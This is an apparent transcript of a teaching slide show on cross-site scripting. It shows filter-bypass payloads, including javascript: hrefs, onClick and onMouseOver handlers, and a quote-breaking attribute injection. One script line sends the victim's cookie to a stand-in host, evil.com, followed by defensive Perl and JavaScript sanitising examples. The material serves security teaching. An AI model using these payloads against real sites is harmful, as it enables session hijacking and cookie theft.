Cross Site Scripting Augusta For Matrix Session
DESCRIPTION
This slide show covers XSS attacks, their various levels, and ways to protect against them.
TRANSCRIPT
By :
Augusta
http://www.steve.org.uk/Hacks/XSS/index.html
XSS (cross-site scripting) attacks almost always focus on sites that use cookies to store your username and password.
XSS appears in the Open Web Application Security Project's (OWASP) top 10 list of exploited vulnerabilities.
The goal is to steal the cookie of a user of the site. "Steal" in this context means getting a copy of it, rather than removing the original.
<script> alert(document.cookie); </script>
submit
Basic filtered input
<script and script> are filtered, i.e. deleted from the input.
Attackers found other ways that do not depend on the script tag.
Other ways of calling JavaScript:
<a href="javascript:alert(document.cookie);">Click me</a>
<a href="advanced.html" onClick="alert(document.cookie)">test</a>
I can run script, what now?
You don't want to have people viewing the popup boxes all day!
You want to do something more useful?
Redirect the user. This would allow you to record the user's cookie for later (ab)use:
<script> document.location = 'http://evil.com/blah.cgi?cookie=' + document.cookie; </script>
This would redirect the user to a CGI script called 'blah.cgi' on a website 'evil.com'.
The CGI script is given the cookie of the innocent user as a parameter called 'cookie'.
To the next level
Using the onClick handler, you have to rely upon the user clicking on a link you have placed.
If the user will not click it, what then?
Use another method: onMouseOver.
This allows you to have code executed when the mouse pointer merely moves over a link.
<a href="whatnow.html" onMouseOver="alert(document.cookie);">Test</a>
Best defense against XSS attacks?
1. Good filtering of input. If you allow users to send messages to each other, for example, you really must filter all input from the sender to make sure it's secure.
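Some sites will allow you to enter a URL, then display it as a clickable link such as:
<a href="URI">URI</a>
If the URI is inserted without encoding, a double quote in the input closes the href attribute and the rest becomes an event handler:
<a href="http://foocome" onMouseOver="alert(document.cookie)">http://foocome" onMouseOver="alert(document.cookie)</a>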
2. Use HTML::Scrubber, a good Perl module for filtering all input.
Read this:
http://search.cpan.org/~podmaster/HTML-Scrubber-0.08/Scrubber.pm
Perl code
    #!/usr/bin/perl -w
    use HTML::Scrubber;
    use strict;

    # Sample input mixing dangerous markup (style, script) with harmless tags
    my $html = q[
    <style type="text/css"> BAD { background: #666; color: #666;} </style>
    <script language="javascript"> alert("Hello, I am EVIL!"); </script>
    <HR>
    a => <a href=1>link </a>
    br => <br>
    b => <B> bold </B>
    u => <U> UNDERLINE </U>
    ];

    # Allow only the listed tags; tags not on the list are removed
    my $scrubber = HTML::Scrubber->new( allow => [ qw[ p b i u hr br ] ] );
    print $scrubber->scrub($html);

    # Now deny those same tags as well and scrub again
    $scrubber->deny( qw[ p b i u hr br ] );
    print $scrubber->scrub($html);
I wasn't satisfied with HTML::Sanitizer because it is based on HTML::TreeBuilder, so I thought I'd write something similar that works directly with HTML::Parser
3. New W3C draft on Mozilla Firefox
4. MS patch :: crsscri
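The basic script-tag filter and the URL-to-link case from the slides above, as an added example that is not part of the original slide show: the filter leaves the event-handler payload untouched, while a scheme allowlist plus output encoding renders the same payloads inert. Function names are hypothetical and the inputs are constructed from the slides' own samples.

```javascript
// Added example; function names are hypothetical, inputs constructed from the slides.

// The slide's basic filter: delete "<script" and "script>" from the input.
function naiveFilter(input) {
  return input.replace(/<script/gi, "").replace(/script>/gi, "");
}

// Vulnerable linkifier: the URI is concatenated into the markup unencoded.
function linkifyUnsafe(uri) {
  return '<a href="' + uri + '">' + uri + "</a>";
}

// Encode the characters that can change HTML or attribute context.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened linkifier: allowlist the scheme, then encode on output.
// Anything that is not a well-formed http(s) URL is shown as inert text.
function linkifySafe(uri) {
  let parsed;
  try {
    parsed = new URL(uri);
  } catch (err) {
    return escapeHtml(uri);
  }
  if (parsed.protocol !== "http:" && parsed.protocol !== "https:") {
    return escapeHtml(uri); // javascript: and other schemes never become links
  }
  return '<a href="' + escapeHtml(parsed.href) + '">' + escapeHtml(uri) + "</a>";
}

// Constructed inputs, reusing the payload strings shown on the slides.
const handlerLink = '<a href="advanced.html" onClick="alert(document.cookie)">test</a>';
const quoteBreak = 'http://foocome" onMouseOver="alert(document.cookie)';
const jsScheme = "javascript:alert(document.cookie);";

console.log(naiveFilter(handlerLink)); // unchanged: there is no script tag to delete
console.log(linkifyUnsafe(quoteBreak)); // quote closes href, handler attribute appears
console.log(linkifySafe(quoteBreak)); // quotes encoded, no handler attribute
console.log(linkifySafe(jsScheme)); // plain text, no anchor element
console.log(linkifySafe("https://example.com/a?b=1&c=2")); // normal link, & encoded
```

Encoding at the point of output is what makes the difference here: the filter tries to guess which strings are dangerous, while the encoder makes every string safe for the attribute it lands in.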
Just another point of view! Is XSS bad or good? Who are you to decide? What about mashups such as 99acre and Google Maps?
Thank you so much. I am honored by your presence.